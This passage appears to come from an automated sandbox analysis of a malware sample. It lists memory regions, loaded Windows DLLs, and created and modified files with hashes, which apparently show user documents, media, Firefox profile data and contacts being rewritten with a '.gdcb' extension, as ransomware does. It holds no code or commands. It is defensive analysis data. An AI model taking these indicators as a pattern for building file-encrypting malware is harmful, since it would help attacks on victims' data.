private_0x0000000000880000 0x00880000 0x0088ffff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x0000000000890000 0x00890000 0x00a10fff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x0000000000a20000 0x00a20000 0x01e1ffff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x0000000001e20000 0x01e20000 0x01fdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001e20000 0x01e20000 0x01f1ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001f20000 0x01f20000 0x01f9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000001fd0000 0x01fd0000 0x01fdffff Private Memory Readable, Writable True False False
  • Region Actions
sortdefault.nls 0x01fe0000 0x02316fff Memory Mapped File Readable False False False
  • Region Actions
private_0x0000000002420000 0x02420000 0x0245ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002460000 0x02460000 0x0255ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002560000 0x02560000 0x0259ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000025a0000 0x025a0000 0x0269ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000026a0000 0x026a0000 0x026dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000026e0000 0x026e0000 0x027dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000027e0000 0x027e0000 0x0281ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002820000 0x02820000 0x0291ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002920000 0x02920000 0x0295ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002960000 0x02960000 0x02a5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002a60000 0x02a60000 0x02a9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002aa0000 0x02aa0000 0x02b9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002ba0000 0x02ba0000 0x02bdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002be0000 0x02be0000 0x02cdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002ce0000 0x02ce0000 0x02d1ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002d20000 0x02d20000 0x02e1ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002e20000 0x02e20000 0x02e5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002e60000 0x02e60000 0x02f5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002f60000 0x02f60000 0x02f9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000002fa0000 0x02fa0000 0x0309ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000030a0000 0x030a0000 0x030dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000030e0000 0x030e0000 0x031dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000031e0000 0x031e0000 0x0321ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003220000 0x03220000 0x0331ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003320000 0x03320000 0x0335ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003360000 0x03360000 0x0345ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003460000 0x03460000 0x0349ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000034a0000 0x034a0000 0x0359ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000035a0000 0x035a0000 0x035dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000035e0000 0x035e0000 0x036dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000036e0000 0x036e0000 0x0371ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003720000 0x03720000 0x0381ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003820000 0x03820000 0x0385ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003860000 0x03860000 0x0395ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003960000 0x03960000 0x0399ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000039a0000 0x039a0000 0x03a9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003aa0000 0x03aa0000 0x03adffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003ae0000 0x03ae0000 0x03bdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003be0000 0x03be0000 0x03c1ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003c20000 0x03c20000 0x03d1ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003d20000 0x03d20000 0x03d5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003d60000 0x03d60000 0x03e5ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003e60000 0x03e60000 0x03e9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003ea0000 0x03ea0000 0x03f9ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003fa0000 0x03fa0000 0x03fdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000003fe0000 0x03fe0000 0x040dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000040e0000 0x040e0000 0x0411ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004120000 0x04120000 0x0421ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004220000 0x04220000 0x0425ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004260000 0x04260000 0x0435ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004360000 0x04360000 0x0439ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000043a0000 0x043a0000 0x0449ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000044a0000 0x044a0000 0x044dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000044e0000 0x044e0000 0x045dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000045e0000 0x045e0000 0x0461ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004620000 0x04620000 0x0471ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004720000 0x04720000 0x0475ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004760000 0x04760000 0x0485ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x0000000004860000 0x04860000 0x0489ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000048a0000 0x048a0000 0x0499ffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000049a0000 0x049a0000 0x049dffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x00000000049e0000 0x049e0000 0x04adffff Private Memory Readable, Writable True False False
  • Region Actions
wow64.dll 0x73cd0000 0x73d1efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64cpu.dll 0x73d20000 0x73d27fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wow64win.dll 0x73d30000 0x73da2fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
dwmapi.dll 0x740c0000 0x740dcfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
uxtheme.dll 0x740e0000 0x74154fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcr100.dll 0x74160000 0x7421efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
wininet.dll 0x74220000 0x74443fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msimg32.dll 0x74450000 0x74455fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
apphelp.dll 0x74460000 0x744f0fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
bcryptprimitives.dll 0x74500000 0x74558fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
cryptbase.dll 0x74560000 0x74569fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sspicli.dll 0x74570000 0x7458dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernelbase.dll 0x745b0000 0x74725fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
sechost.dll 0x74730000 0x74772fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel32.dll 0x74780000 0x7486ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msctf.dll 0x748c0000 0x749dffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
combase.dll 0x749e0000 0x74b99fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
rpcrt4.dll 0x74ba0000 0x74c4bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
advapi32.dll 0x74c90000 0x74d0afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
crypt32.dll 0x74d10000 0x74e84fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
powrprof.dll 0x74ef0000 0x74f33fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shlwapi.dll 0x75100000 0x75143fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msasn1.dll 0x751f0000 0x751fdfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shcore.dll 0x75260000 0x752ecfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
kernel.appcore.dll 0x75650000 0x7565bfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
gdi32.dll 0x75660000 0x757acfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
windows.storage.dll 0x757b0000 0x75c8cfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
shell32.dll 0x75c90000 0x7704efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
user32.dll 0x77050000 0x7718ffff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
imm32.dll 0x771f0000 0x7721afff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
profapi.dll 0x77230000 0x7723efff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
msvcrt.dll 0x773a0000 0x7745dfff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
ntdll.dll 0x77460000 0x775d8fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x000000007fe50000 0x7fe50000 0x7fe52fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007fe53000 0x7fe53000 0x7fe55fff Private Memory Readable, Writable True False False
  • Region Actions
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False
  • Region Actions
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
  • Region Actions
private_0x000000007ffd5000 0x7ffd5000 0x7ffd7fff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffd8000 0x7ffd8000 0x7ffdafff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffdb000 0x7ffdb000 0x7ffddfff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True False False
  • Region Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
  • Region Actions
private_0x000000007fff0000 0x7fff0000 0x7ff9ee76ffff Private Memory Readable True False False
  • Region Actions
ntdll.dll 0x7ff9ee770000 0x7ff9ee931fff Memory Mapped File Readable, Writable, Executable False False False
  • Region Actions
private_0x00007ff9ee932000 0x7ff9ee932000 0x7ffffffeffff Private Memory Readable True False False
  • Region Actions
For performance reasons, the remaining 199 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\storage.sqlite.gdcb 1.27 KB (1296 bytes) MD5: 6f2a52c09fa7f6d3c69675aac90d37a0
SHA1: cf6322306317c5a27e5c0f7a0da3f3f9232b34a3
SHA256: 1d510585ce43f029a70421c6bded60edf95f921b514cd618216e76c74a79134a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\times.json.gdcb 0.55 KB (560 bytes) MD5: c13e394d8c873033447ffaf34c811ba2
SHA1: f906dd014a476dd5caf67028cc455ba030bbbbf8
SHA256: 07766239384fcb6dd9f632361e234f384b04613057e88eb8cb417277f459eb12 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\webappsstore.sqlite.gdcb 96.52 KB (98832 bytes) MD5: bffd156531792f40cefa19e057dad558
SHA1: 94bebb8ad09222b7af1e7a089a05355f4293c99c
SHA256: 52019841567ab9acf3eb39cbbf861c57418c104b145d251a24fcc3512061f0d8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\xulstore.json.gdcb 1.33 KB (1360 bytes) MD5: 52edb27b678a1423cc5a7c395ef9608b
SHA1: e6c1100157864135373cad6ade9a053376cf4a25
SHA256: 6fdd876dfa1b9c30e419ad3dac18e8faadcb0da33de2a40127889af556643697 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles.ini.gdcb 0.64 KB (656 bytes) MD5: f9b2be39da460d7ba7d475b20ccfc59d
SHA1: d7f6f8a7815a14efdebb2754040e8fb73a347ca3
SHA256: f21a073bcdaf73514ec6a0d7fb9853713a03cd18e575bfa4da5d14b8d2be2d6f 		False
c:\users\ciihmnxmn6ps\appdata\roaming\pp7pzivznjg.gif.gdcb 71.19 KB (72896 bytes) MD5: d57dbcbf6a88104beb63b936dc523e3b
SHA1: fd79e1963a73ef30addd8b225fb4e4d06ffe92cf
SHA256: 7c5a6e99c73e948a038c9dbf2a891c7187ce76c70345848e84bbff30905777b2 		False
c:\users\ciihmnxmn6ps\appdata\roaming\py_6.pdf.gdcb 11.94 KB (12224 bytes) MD5: e0c6b057994cea53aca5f8f94498c0d8
SHA1: 58b7c5d30ed9df0fe283aba2f368b826337e28f3
SHA256: 76baf9d9a12200bc983502dcf8c274adb689a8bfe65c21c3d8a4827d6bcc0dac 		False
c:\users\ciihmnxmn6ps\appdata\roaming\qvlruvqbw5.mp3.gdcb 32.67 KB (33456 bytes) MD5: 698b179fa80e5f6a2e6e5b2c882fa516
SHA1: 2c5edc2e66f4f46a812b49b6ae9763714737b001
SHA256: 00d687b4f63a0ca65f90a85e6cb6d8c619984eb5e5d325897db9445a3828bf95 		False
c:\users\ciihmnxmn6ps\appdata\roaming\rdjeorfwlmiukr-wj-g.mp3.gdcb 27.92 KB (28592 bytes) MD5: dba97cfd81384dade62415ad23075d8e
SHA1: c17f1563210af31c488a83d1c55526b7db443428
SHA256: 9b03c0a4a0fa330d1c9ded547ac823b245a0597844845652f7dae41d7d48e455 		False
c:\users\ciihmnxmn6ps\appdata\roaming\s-oozle.avi.gdcb 19.31 KB (19776 bytes) MD5: 10585553cebfdd919b6ac2566eac0528
SHA1: dfb94d643f80ba5350ad74277ae2bd3364b93173
SHA256: 954c159ff12cefe8f56dad1a01c647afc990e76d77e2b42047672e0cc83e6c07 		False
c:\users\ciihmnxmn6ps\appdata\roaming\sao0lzdqm lb1jo.bmp.gdcb 76.23 KB (78064 bytes) MD5: 741bee2e736b4f9430c4880106dc06a2
SHA1: b5544585893e5f687bd35b6b75489f5f8ff54464
SHA256: 8e8a8dd1726a2bf6824bdcf0905d20e74a317bfd1d898b2d3a7b15df812e2413 		False
c:\users\ciihmnxmn6ps\appdata\roaming\skype\roottools\roottools.conf.gdcb 0.59 KB (608 bytes) MD5: e00bfaaa0bda8ae0bcc8759e6438bd98
SHA1: 6018634d3a55422a1b662358f196b0da7f28ace4
SHA256: c1d825c97c241f7a29f8278f3beb441b99a76ede63b760e136c7f3e333baec9c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\srk1.flv.gdcb 67.34 KB (68960 bytes) MD5: 9adbbbed445282b7c1374621cc0c30b5
SHA1: f119dedf61c417e1809dbc6de57d93d5e264ed9f
SHA256: 66fc505324a7d415fa2550ee6ccc2adc00b6a64de4e9669043638978893ff75e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\ufabmkau-rjobgodjy23.swf.gdcb 23.61 KB (24176 bytes) MD5: a39a82e1744b9603dc631703b82f092e
SHA1: df8706892164e938506756ed8a1fe5aa0ab469dc
SHA256: 478cb831a5c381593a3ef08eff9f576b0fa74712e6144472728089f5267d77cf 		False
c:\users\ciihmnxmn6ps\appdata\roaming\xdfxtyw.m4a.gdcb 92.56 KB (94784 bytes) MD5: 47b32f582829fc149c1ad975f7671b66
SHA1: dbf064c04dfff84e7e622733378542c81151869a
SHA256: 36dde405c3e3f3dafcf4e55a9414f9401ac1ac175daaa26d773f74b3c4f8e473 		False
c:\users\ciihmnxmn6ps\appdata\roaming\xx9l.avi.gdcb 74.25 KB (76032 bytes) MD5: 0eeb629f0eb9412ff0738d93418d1c9e
SHA1: 85fa1bb9d2696df770fb46a4b9a2685319df9ac7
SHA256: 602d3244d848e5752a29fe638b65cccfcd85a49e30b2aafc7901ec1968b3d80a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\x_3ykeu9f6ozxw.swf.gdcb 4.48 KB (4592 bytes) MD5: 4fe96b1e09829e3f42ecd021c3e85d10
SHA1: 2412d3f539c38b8285928b16525d9c40b54481f8
SHA256: 37e5d8f5f86f9ebdbe1ddf77bab3791fa4bbdd350bc83f11e37f62ec4340a6c5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\yzrhhbr e0en.wav.gdcb 22.72 KB (23264 bytes) MD5: 6452ffb3827cb5556b4c6355c9c28b6e
SHA1: cad5ffd351dcdf6d5ba4ff8d6142819251da7d2c
SHA256: 4d09c75cdfbccfa2ef93806551cd707400cd44990fa0addf71434d57052f5e81 		False
c:\users\ciihmnxmn6ps\appdata\roaming\z5f8f.pdf.gdcb 47.03 KB (48160 bytes) MD5: f777816652dd4210dafcbddd17ce9415
SHA1: 77ad0642cbf80dc0453d54cf1dab63ef8105d0bb
SHA256: 188425c773868fdd14e52b6f2b2477525e4cd3bb434fc38e238552c68663ef44 		False
c:\users\ciihmnxmn6ps\contacts\aclviho asldjfl.contact.gdcb 1.67 KB (1712 bytes) MD5: 2b1714598076b3960ed27c2d3b9f6d2e
SHA1: 856ba41045c8395875d330d9571a48b325ce4166
SHA256: c4d0cd2a3f823e017690af78baeb16cc121bc588dba8f1b2ea939e2fcf3d4053 		False
c:\users\ciihmnxmn6ps\contacts\asdlfk poopvy.contact.gdcb 1.67 KB (1712 bytes) MD5: 4f8ab5551de4b63418f33c793b55d29e
SHA1: 203aaf9efa41dad37802d11fe8daa25dfe2880f1
SHA256: 1dfde3fe4e5134211e9c5311311045118d22959bc71cb0ba664efe9bbe34fc48 		False
c:\users\ciihmnxmn6ps\contacts\chucu jadnvk.contact.gdcb 1.67 KB (1712 bytes) MD5: ef62f6e9e42054153de73c873b2e377e
SHA1: 6409c597cb6ad5f431902d89d556d5a6e3611400
SHA256: b269b2d672db2bd36d0bf40c6440e7e23de1072c94597445f82c8b2a10ab5ebb 		False
c:\users\ciihmnxmn6ps\contacts\lulcit amkdfe.contact.gdcb 1.67 KB (1712 bytes) MD5: ae6f0f8df15f844656f13f8e1eba2209
SHA1: 0617e004cd7d582ceed897f2e66acc2413bd435d
SHA256: 2c6328770748881c9ea17cbd97c22ed5a149d0918032da82789a9869181050fb 		False
c:\users\ciihmnxmn6ps\contacts\sikvnb huvuib.contact.gdcb 1.80 KB (1840 bytes) MD5: 72f57c6c885b18c9ad1e97f7530db5d5
SHA1: 7d5ae2df99f784c930b4fbc84c65064b56074f41
SHA256: 9914b535d048c4596854f57efe89cef04f32fc68741147d226f81734ac32fbe7 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\-__krkwudncw7vix_s.wav.gdcb 51.19 KB (52416 bytes) MD5: b95857b0b180b1b3b086a7861ddeaa7d
SHA1: 7541d650523036993cabf3fdf89e41eefdd6c74b
SHA256: cf570f6643c64a1721afd8b0de34c84316939d4083e074f20abd90a3a821bdcb 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\8g6mia 6.pptx.gdcb 35.95 KB (36816 bytes) MD5: 38ee62682ffe9ac583b2dff019f52d5e
SHA1: 1a01784e9062b03e20f94295fb5c715d81997775
SHA256: 3ccd1425c07d594aafa0e6409ddcf353a49796500ce6ba5d976567e7d0235e04 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\lfbogup.mp3.gdcb 74.17 KB (75952 bytes) MD5: c6136a90fcead756bd15ce909ebf17a3
SHA1: 68fa51b8a08f5f3a10f708819f826e043e98a8ff
SHA256: 2f24d74efbe540ac507c5e3ff4ff1edc3043f78bc525acd1b5e5a2bf7b5592b8 		False
c:\users\ciihmnxmn6ps\ntuser.ini.gdcb 0.55 KB (560 bytes) MD5: 5311bfb29d17a6f43408b9ba889c684d
SHA1: 4886bd5d287310cc988664b2b1c71ea4450bada2
SHA256: c5caf30250e61f4947d76f63620c2356341ff52983d9982e885ba4fc8a13e7bf 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\l_gium\9vo634vvey9vgoholzg.mkv.gdcb 43.11 KB (44144 bytes) MD5: 40a59cc8ae2897597d62beae6a193186
SHA1: 064cb087cbf7e299f68278b3f24420aa870ce474
SHA256: 6bb5123e04e605d69620ea8326f9821d86cb7928b62645ae99a6739ee5da5e9b 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\l_gium\js0e pahtzszw9mdks.wav.gdcb 29.78 KB (30496 bytes) MD5: 5ddb4cd194ed2f62b689a7190e03ca07
SHA1: e82f9533b25b4be2167fd6347189121b5569ac85
SHA256: 7c1675d282b5241550ee712b54db12ef9b3f5d1b88978065a3fd07e4b78603aa 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\l_gium\orndnmfjcdfa1es0enx.flv.gdcb 89.34 KB (91488 bytes) MD5: 318b73782ef8f9070fca04551c5ae07c
SHA1: 0f21758fe57cceb67b99cf34c5cfe86c1c79c004
SHA256: 58183f911b03152edd88e2902d8a45ebc3379012464035238d9dbbdc5a6e2291 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\l_gium\owxzt uxeior.mp3.gdcb 25.69 KB (26304 bytes) MD5: 15db8c2396bef5efad7dc2c3fbc31a5f
SHA1: a5a950a38faf69e346385d08497eff5a993549e6
SHA256: 8556d5f62111b357e374e390e83463ca2537b1e5a32fb73768191c6e08b36f3f 		False
c:\users\ciihmnxmn6ps\desktop\0eert0ljww1qhv\mxha9qwx60.mp4.gdcb 66.47 KB (68064 bytes) MD5: e4507e1f61bf2dd49c84ad77069f7ad7
SHA1: 7d6df185a8d11d7ee6bfc94b1ffac084b0dc824a
SHA256: 84ce5b56a4aacd7ed85f101e5089654df4845bdafa19fe0b13ae919b02db272f 		False
c:\users\ciihmnxmn6ps\desktop\210atvavnz- j.avi.gdcb 70.59 KB (72288 bytes) MD5: 0a49d0417ef684b80a55deeb583c717b
SHA1: bcd9a5f48184ac3079c0756874a5a2e63c8b11a0
SHA256: e18dcee9b5c662e81d02c07aa5bc0128e3f6c6de18738dab62f4c1254d5b9941 		False
c:\users\ciihmnxmn6ps\desktop\4wen.jpg.gdcb 64.14 KB (65680 bytes) MD5: 9b1658583a58161f2e53024c6c42fb22
SHA1: ba65f0d002ab839bd9e5a0b2418472bbb94ab1c1
SHA256: b6cb643d26ccb1f424609d6fa757a00f0d8d409ce34c9b436d6b8b02ac679cb3 		False
Modified Files
+
Filename File Size Hash Values YARA Match Actions
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\times.json 0.55 KB (560 bytes) MD5: c13e394d8c873033447ffaf34c811ba2
SHA1: f906dd014a476dd5caf67028cc455ba030bbbbf8
SHA256: 07766239384fcb6dd9f632361e234f384b04613057e88eb8cb417277f459eb12 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\webappsstore.sqlite 96.52 KB (98832 bytes) MD5: bffd156531792f40cefa19e057dad558
SHA1: 94bebb8ad09222b7af1e7a089a05355f4293c99c
SHA256: 52019841567ab9acf3eb39cbbf861c57418c104b145d251a24fcc3512061f0d8 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles\8i341t8m.default\xulstore.json 1.33 KB (1360 bytes) MD5: 52edb27b678a1423cc5a7c395ef9608b
SHA1: e6c1100157864135373cad6ade9a053376cf4a25
SHA256: 6fdd876dfa1b9c30e419ad3dac18e8faadcb0da33de2a40127889af556643697 		False
c:\users\ciihmnxmn6ps\appdata\roaming\mozilla\firefox\profiles.ini 0.64 KB (656 bytes) MD5: f9b2be39da460d7ba7d475b20ccfc59d
SHA1: d7f6f8a7815a14efdebb2754040e8fb73a347ca3
SHA256: f21a073bcdaf73514ec6a0d7fb9853713a03cd18e575bfa4da5d14b8d2be2d6f 		False
c:\users\ciihmnxmn6ps\appdata\roaming\pp7pzivznjg.gif 71.19 KB (72896 bytes) MD5: d57dbcbf6a88104beb63b936dc523e3b
SHA1: fd79e1963a73ef30addd8b225fb4e4d06ffe92cf
SHA256: 7c5a6e99c73e948a038c9dbf2a891c7187ce76c70345848e84bbff30905777b2 		False
c:\users\ciihmnxmn6ps\appdata\roaming\py_6.pdf 11.94 KB (12224 bytes) MD5: e0c6b057994cea53aca5f8f94498c0d8
SHA1: 58b7c5d30ed9df0fe283aba2f368b826337e28f3
SHA256: 76baf9d9a12200bc983502dcf8c274adb689a8bfe65c21c3d8a4827d6bcc0dac 		False
c:\users\ciihmnxmn6ps\appdata\roaming\qvlruvqbw5.mp3 32.67 KB (33456 bytes) MD5: 698b179fa80e5f6a2e6e5b2c882fa516
SHA1: 2c5edc2e66f4f46a812b49b6ae9763714737b001
SHA256: 00d687b4f63a0ca65f90a85e6cb6d8c619984eb5e5d325897db9445a3828bf95 		False
c:\users\ciihmnxmn6ps\appdata\roaming\rdjeorfwlmiukr-wj-g.mp3 27.92 KB (28592 bytes) MD5: dba97cfd81384dade62415ad23075d8e
SHA1: c17f1563210af31c488a83d1c55526b7db443428
SHA256: 9b03c0a4a0fa330d1c9ded547ac823b245a0597844845652f7dae41d7d48e455 		False
c:\users\ciihmnxmn6ps\appdata\roaming\s-oozle.avi 19.31 KB (19776 bytes) MD5: 10585553cebfdd919b6ac2566eac0528
SHA1: dfb94d643f80ba5350ad74277ae2bd3364b93173
SHA256: 954c159ff12cefe8f56dad1a01c647afc990e76d77e2b42047672e0cc83e6c07 		False
c:\users\ciihmnxmn6ps\appdata\roaming\sao0lzdqm lb1jo.bmp 76.23 KB (78064 bytes) MD5: 741bee2e736b4f9430c4880106dc06a2
SHA1: b5544585893e5f687bd35b6b75489f5f8ff54464
SHA256: 8e8a8dd1726a2bf6824bdcf0905d20e74a317bfd1d898b2d3a7b15df812e2413 		False
c:\users\ciihmnxmn6ps\appdata\roaming\skype\roottools\roottools.conf 0.59 KB (608 bytes) MD5: e00bfaaa0bda8ae0bcc8759e6438bd98
SHA1: 6018634d3a55422a1b662358f196b0da7f28ace4
SHA256: c1d825c97c241f7a29f8278f3beb441b99a76ede63b760e136c7f3e333baec9c 		False
c:\users\ciihmnxmn6ps\appdata\roaming\srk1.flv 67.34 KB (68960 bytes) MD5: 9adbbbed445282b7c1374621cc0c30b5
SHA1: f119dedf61c417e1809dbc6de57d93d5e264ed9f
SHA256: 66fc505324a7d415fa2550ee6ccc2adc00b6a64de4e9669043638978893ff75e 		False
c:\users\ciihmnxmn6ps\appdata\roaming\ufabmkau-rjobgodjy23.swf 23.61 KB (24176 bytes) MD5: a39a82e1744b9603dc631703b82f092e
SHA1: df8706892164e938506756ed8a1fe5aa0ab469dc
SHA256: 478cb831a5c381593a3ef08eff9f576b0fa74712e6144472728089f5267d77cf 		False
c:\users\ciihmnxmn6ps\appdata\roaming\xdfxtyw.m4a 92.56 KB (94784 bytes) MD5: 47b32f582829fc149c1ad975f7671b66
SHA1: dbf064c04dfff84e7e622733378542c81151869a
SHA256: 36dde405c3e3f3dafcf4e55a9414f9401ac1ac175daaa26d773f74b3c4f8e473 		False
c:\users\ciihmnxmn6ps\appdata\roaming\xx9l.avi 74.25 KB (76032 bytes) MD5: 0eeb629f0eb9412ff0738d93418d1c9e
SHA1: 85fa1bb9d2696df770fb46a4b9a2685319df9ac7
SHA256: 602d3244d848e5752a29fe638b65cccfcd85a49e30b2aafc7901ec1968b3d80a 		False
c:\users\ciihmnxmn6ps\appdata\roaming\x_3ykeu9f6ozxw.swf 4.48 KB (4592 bytes) MD5: 4fe96b1e09829e3f42ecd021c3e85d10
SHA1: 2412d3f539c38b8285928b16525d9c40b54481f8
SHA256: 37e5d8f5f86f9ebdbe1ddf77bab3791fa4bbdd350bc83f11e37f62ec4340a6c5 		False
c:\users\ciihmnxmn6ps\appdata\roaming\yzrhhbr e0en.wav 22.72 KB (23264 bytes) MD5: 6452ffb3827cb5556b4c6355c9c28b6e
SHA1: cad5ffd351dcdf6d5ba4ff8d6142819251da7d2c
SHA256: 4d09c75cdfbccfa2ef93806551cd707400cd44990fa0addf71434d57052f5e81 		False
c:\users\ciihmnxmn6ps\appdata\roaming\z5f8f.pdf 47.03 KB (48160 bytes) MD5: f777816652dd4210dafcbddd17ce9415
SHA1: 77ad0642cbf80dc0453d54cf1dab63ef8105d0bb
